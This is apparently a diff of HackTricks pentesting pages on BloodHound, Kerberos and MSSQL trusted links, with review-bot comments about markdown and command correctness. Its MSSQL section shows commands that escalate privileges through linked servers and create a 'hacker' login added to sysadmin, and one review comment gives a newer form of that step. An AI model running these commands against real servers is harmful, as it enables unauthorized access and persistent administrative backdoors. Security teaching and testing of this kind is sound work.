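Review bot: `$ curl -o "~/.config/bloodhound/customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/customqueries.json"` does not work as written: inside double quotes the shell does not expand `~`, so curl tries to write to a literal `~/.config/...` path relative to the current directory and fails unless such a directory exists. Drop the quotes around the path (or use `$HOME/.config/bloodhound/customqueries.json`), drop the `$ ` prompt that breaks copy-paste, and restore the `sh` tag the fence lost in this hunk. The ordered list is now `1.`, `1.`, `1.` (`1. Ingestors`, `1. Learn the path from the graph`); markdown renumbers it on render but the raw file is harder to read, and `Bloodhound come with various queries to highlight sensitive compromission path. It it possible to add custom queries` needs `comes`, `compromise paths` and `It is`.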
@ -91,11 +92,11 @@ You will be prompted for the database credentials: **neo4j:\<Your new password>*
|
|||
|
||||
And bloodhound will be ready to ingest data.
|
||||
|
||||
![](<../../.gitbook/assets/image (171).png>)
|
||||
![](<../../.gitbook/assets/image (171) (1).png>)
|
||||
|
||||
# Ingestors
|
||||
## Ingestors
|
||||
|
||||
## Windows
|
||||
### Windows
|
||||
|
||||
They have several options but if you want to run SharpHound from a PC joined to the domain, using your current user and extract all the information you can do:
|
||||
|
||||
|
@ -114,7 +115,7 @@ runas /netonly /user:domain\user "powershell.exe -exec bypass"
|
|||
|
||||
[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
|
||||
|
||||
## **Python**
|
||||
### **Python**
|
||||
|
||||
If you have domain credentials you can run a **python bloodhound ingestor from any platform** so you don't need to depend on Windows.\
|
||||
Download it from [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) or doing `pip3 install bloodhound`
|
||||
|
@ -144,5 +145,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,12 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
|
||||
|
||||
|
@ -112,7 +110,7 @@ In this section, the sequency of messages to perform authentication will be stud
|
|||
|
||||
Firstly, user must get a TGT from KDC. To achieve this, a KRB\_AS\_REQ must be sent:
|
||||
|
||||
![KRB\_AS\_REQ schema message](<../../.gitbook/assets/image (175).png>)
|
||||
![KRB\_AS\_REQ schema message](<../../.gitbook/assets/image (175) (1).png>)
|
||||
|
||||
_KRB\_AS\_REQ_ has, among others, the following fields:
|
||||
|
||||
|
@ -219,12 +217,10 @@ After that, if user privileges are rigth, this can access to service. If is the
|
|||
* Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036)
|
||||
* Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# MSSQL Trusted Links
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,15 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## MSSQL Trusted Links
|
||||
|
||||
# MSSQL Trusted Links
|
||||
|
||||
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA). \
|
||||
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\
|
||||
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
|
||||
|
||||
**The links between databases work even across forest trusts.**
|
||||
|
||||
## **Powershell**
|
||||
### **Powershell**
|
||||
|
||||
```bash
|
||||
Import-Module .\PowerupSQL.psd1
|
||||
|
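Review bot: this hunk goes the opposite way from the rest of the commit: `## MSSQL Trusted Links` becomes `# MSSQL Trusted Links`, which gives the page two H1 headings (the file title at the top is already `# MSSQL Trusted Links`) while every other page here demotes in-body `#` headings to `##`. Keep it as `##`. Also, the fence under `### **Powershell**` is tagged ```bash but contains PowerShell (`Import-Module .\PowerupSQL.psd1`; the module is spelled `PowerUpSQL`), and `This trusts can be chained` should be `These trusts`.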
@ -77,7 +76,7 @@ Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
|
|||
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
|
||||
```
|
||||
|
||||
## Metasploit
|
||||
### Metasploit
|
||||
|
||||
You can easily check for trusted links using metasploit.
|
||||
|
||||
|
@ -89,7 +88,7 @@ msf> use exploit/windows/mssql/mssql_linkcrawler
|
|||
|
||||
Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)
|
||||
|
||||
## Manual - Openquery()
|
||||
### Manual - Openquery()
|
||||
|
||||
From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like:
|
||||
|
||||
|
@ -101,10 +100,10 @@ From Windows you could also find the links and execute commands manually using a
|
|||
|
||||
_Login using Windows authentication:_
|
||||
|
||||
![](<../../.gitbook/assets/image (167).png>)
|
||||
![](<../../.gitbook/assets/image (167) (1).png>)
|
||||
|
||||
_Find links inside the accessible MSSQL server (in this case the link is to dcorp-sql1):_\
|
||||
__`select * from master..sysservers`
|
||||
\_\_`select * from master..sysservers`
|
||||
|
||||
![](<../../.gitbook/assets/image (168).png>)
|
||||
|
||||
|
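Review bot: the change from `__`select * from master..sysservers`` to `\_\_`select * from master..sysservers`` now renders two literal underscores in front of the query; the `__` is a leftover from broken bold markup and should be deleted, leaving only the inline code. `master..sysservers` still resolves but is a compatibility view; `select * from sys.servers` is the current catalog view and worth showing beside it.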
@ -117,7 +116,7 @@ You can continue these trusted links chain forever manually.
|
|||
|
||||
Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method:
|
||||
|
||||
## Manual - EXECUTE
|
||||
### Manual - EXECUTE
|
||||
|
||||
You can also abuse trusted links using EXECUTE:
|
||||
|
||||
|
@ -127,8 +126,6 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
|
|||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
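Review bot: the nested `EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"` example only works when the linked server has the `RPC Out` option enabled; otherwise `EXECUTE ... AT` fails with error 7411 (`Server ... is not configured for RPC`), which is exactly why the `openquery()` path above sometimes works when this one does not, and vice versa. A sentence stating that, plus a note that `sp_addsrvrolemember` is deprecated (`ALTER SERVER ROLE sysadmin ADD MEMBER hacker` is the current form), would make the section self-contained.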
@ -144,5 +141,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|